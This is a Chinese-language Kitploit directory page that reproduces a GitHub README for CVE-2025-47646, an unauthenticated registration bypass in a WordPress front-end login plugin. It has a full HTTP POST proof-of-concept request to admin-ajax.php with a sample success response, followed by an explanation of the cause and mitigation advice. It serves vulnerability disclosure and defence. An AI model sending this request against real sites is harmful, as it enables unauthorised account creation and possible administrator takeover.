Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-47646 — WordPress PSW 前端登录与注册插件 <= 1.12 存在身份验证失效漏洞 | Kitploit
工具/GitHubGitHub/nxploited/cve-2025-47646
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试身份验证学习与教育
GitHubnxploited/cve-2025-47646

CVE-2025-47646

WordPress PSW 前端登录与注册插件 <= 1.12 存在身份验证失效漏洞

查看仓库
211年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

🔐 CVE-2025-47646 – PSW 前端登录与注册插件 <= 1.12

📌 插件信息

  • 插件: PSW 前端登录与注册
  • 受影响版本: <= 1.12
  • CVE: CVE-2025-47646
  • 严重性: 高 (CVSS 9.8)
  • 漏洞类型: 认证绕过
  • 所需权限: 无需认证
  • 已修复: ❌ 暂无官方修复
  • 修复优先级: 🔴 高
  • 发布日期: 2025年5月8日

⚠️ 漏洞概述

该插件在其注册机制中暴露了一个严重缺陷。虽然它提供了一个基于短代码的前端注册表单([psw_registration]),但未能强制执行适当的角色限制或安全验证。

攻击者可以利用此机制在无需认证的情况下创建账户——如果站点的 default_role 配置错误(例如设置为 administrator),则可能导致完全权限提升。


🧪 概念验证 (PoC)

✅ 目标端点:

root@kitploit:~
POST /wordpress/wp-admin/admin-ajax.php

📥 请求(例如通过 Burp Suite 或 curl):

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1

Host: {Host}

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate, br

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Content-Length: 233

Origin: {Host}

Connection: keep-alive

Cookie:

Priority: u=0



first_name=nxploited&last_name=nxploited&new_user_name=nxpl3432oited&new_user_email=NxploitBot%40gmail.com&new_user_password=admin&new_user_password_confirmation=admin&action=register_user_front_end&psw_form=75a32ef38d

psw_form 是请求所需的 nonce 字段。
该 nonce 由前端的 [psw_registration] 短代码动态生成。


✅ 成功响应

root@kitploit:~
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8

<h4>Hello nxploited nxploited</h4>
<p>Thanks for creating an account on our website. Please check your email for activation link...</p>

🛠️ 缺陷在哪里?

  • 该插件允许未经认证的 AJAX 访问 register_user_front_end
  • 它遵循 WordPress 中的 default_role 设置来分配用户角色
  • 如果此设置配置错误(administrator),攻击者将获得完全访问权限
  • 插件逻辑中没有硬编码的角色强制或验证

💬 短代码说明

要暴露注册表单并为 psw_form 生成有效的 nonce,请使用以下短代码:

root@kitploit:~
[psw_registration]

这会渲染一个注册表单,其中包含使 AJAX 调用成功所需的隐藏 nonce 字段。


🔐 建议

  • 限制未经认证的 AJAX 注册
  • 在服务器端强制角色分配
  • 监控并将 default_role 锁定为安全值(例如 subscriber)
  • 如果无可用更新,请应用虚拟补丁

⚠️ 免责声明

本报告仅用于教育和授权的安全测试目的。未经许可利用此漏洞可能违反法律和道德界限。


NXploited (Khaled_Alenazi)

下载工具